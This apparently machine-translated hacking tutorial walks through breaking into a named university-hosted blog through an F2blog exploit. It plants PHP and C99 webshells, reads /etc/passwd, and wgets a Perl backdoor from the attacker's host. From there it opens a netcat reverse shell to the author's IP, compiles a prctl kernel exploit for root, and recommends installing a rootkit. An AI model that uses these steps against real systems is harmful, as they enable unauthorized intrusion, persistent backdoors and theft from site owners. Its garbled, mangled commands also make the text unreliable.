Full display from web vulnerabilities to root permissions

Intermediary transaction http://www.aliyun.com/zixun/aggregation/6858.html ">seo diagnose Taobao guest cloud host technology Hall

Very early to write an article from the basic web vulnerabilities to the end of the entire process of root permissions, but has been suffering no time, recently more relaxed, so seize the time to write this article. No more nonsense to say, or to see the article together.

Often see black defense friend must know F2blog loophole, this time we explain the use of f2blog to get Webshell to the end of the process to get root, I believe there are a lot of skills you can learn.

First go to milw0rm.com to search for the F2blog exploit program and download it back. With exp, we can use Google to easily search for many of these programs, we in the results of random selection of a site http://www.jwit.edu.tw/~s9246071/blog/as our goal today. First of all to save exp to C:\USR\LOCAL\PHP5, because I use WAPM, you can go to http://www.wapm.cn/download. OK, let's go into the PHP directory to perform exp, as shown in Figure 1, which is the f2blog.php run interface. According to the requirements of exp, we fill in the parameters and execute them as shown in Figure 2. Probably waited for 3 minutes of time, appear as shown in Figure 3 picture shows that we have succeeded, got a word of the PHP trojan, address is http://www.jwit.edu.tw/~s9246071/blog/cache/loveshell.php.

Take out Lanker write asp&php a word trojan Client connection our lovely little Trojan, as shown in Figure 4, we successfully got a webshell. But such webshell after all very afflictive, use Lanker client to upload a big horse to go up. We first get the path of the web as "/home3/s9246071/public_html/blog/cache", with the path can be uploaded function, upload a C99shell trojan, successful access to it, as shown in Figure 5, this machine is really good ah, have 602G hard disk capacity! I habitually looked at my permissions and entered "Id;uname a" in command execute with the following results: uid=30 (wwwrun) gid=8 (www) groups=8 (www) Linux www 2.6.5-7.257-BIGSMP #1 SMP Mon may 14:14:14 UTC 2006 i686 i686 i386 GNU, the kernel is 2.6.5 version and the operating system is SuSe9.0.

Although we already have Webshell, but that's not enough, we have to get a local shell to run the local power tool. In the command input "CAT/ETC/PASSWD" can get some users, you can use streamer try to see if there are no mentally retarded users, of course, I will not waste time, but directly with comeback back door, let the server connected to my own machine. First, upload the comeback back door to my space http://cnbird.ifastnet.com/comeback.pl, then execute the command in Webshell "wget http://cnbird.ifastnet.com/ COMEBACK.PL-P/tmp "means to download the comeback.pl to the"/tmp "directory. Friends who know Unix should know that the permissions for the "/tmp" directory are readable and writable. As shown in Figure 6, we have successfully uploaded the comeback back door, under Webshell under the implementation bar! Enter the command "perl/tmp/comeback.pl", and the result is "Connect" backdoor by Ch3m0nz-satanic Souls alv/tmp/comeback.pl [Host] ", this order is to tell us the specific use of the backdoor. First look at my own IP address, and then use NC to bind a port OK. My computer's IP address is 121.16.23.25, in the cmd input "nc.exe-vv-l-P 12345", meaning to open a local 12345 port, let the remote machine through this port to connect. Then go back to Webshell to execute "perl/tmp/comeback.pl 121.16.23.25 12345", as shown in Figure 7, NC has reacted, we can execute the shell here, hehe. To make this shell more intuitive, I'll just type "bash I" and enter the following basic commands: Who, W, ls, and pwd, the meaning of these commands, and friends who don't know can use Google to find them.

So we get a shell, and the next thing to do is to raise the right. Linux has a Pctrl local overflow vulnerability, let's look at the description of the vulnerability first! A vulnerability exists in the Linux kernel Prctl () call when handling core dump, which may be exploited by a local attacker to elevate his or her privileges. The Prctl () call allows the unauthorized process to set the pr_set_dumpable=2, so the core file generated when a segment error occurs will be owned by the root user. Local users can create malicious programs that dump core files into directories that normally do not have permission to write, which can result in denial of service or root permissions. We went to Google to search for this flaw exp, quickly found the use of program PRTCL.C, put it on the local set up the server. Execute the command "wget http://121.16.23.25/prtcl2.c" in the shell, can successfully upload to the server, the following start compile execution. Because this vulnerability program requires static compilation, so execute the command "gcc prtcl2.c-o local-static Wall", after the successful compilation, we entered the wwwrun@www:/tmp>./local, the program began to execute, wait 1 minutes or so time , enter the command "ID", and we can see that this time we are already root, as shown in Figure 8.

The remaining thing is to install a rootkit, the current more classic adore-ng, SK2.0 and so on, installation method here will no longer introduce. If you are not familiar with rootkit friends, you can refer to a very classic online rootkit article, its address http://baoz.net/html/document/200603/1143618484.html, hope to be helpful to everyone.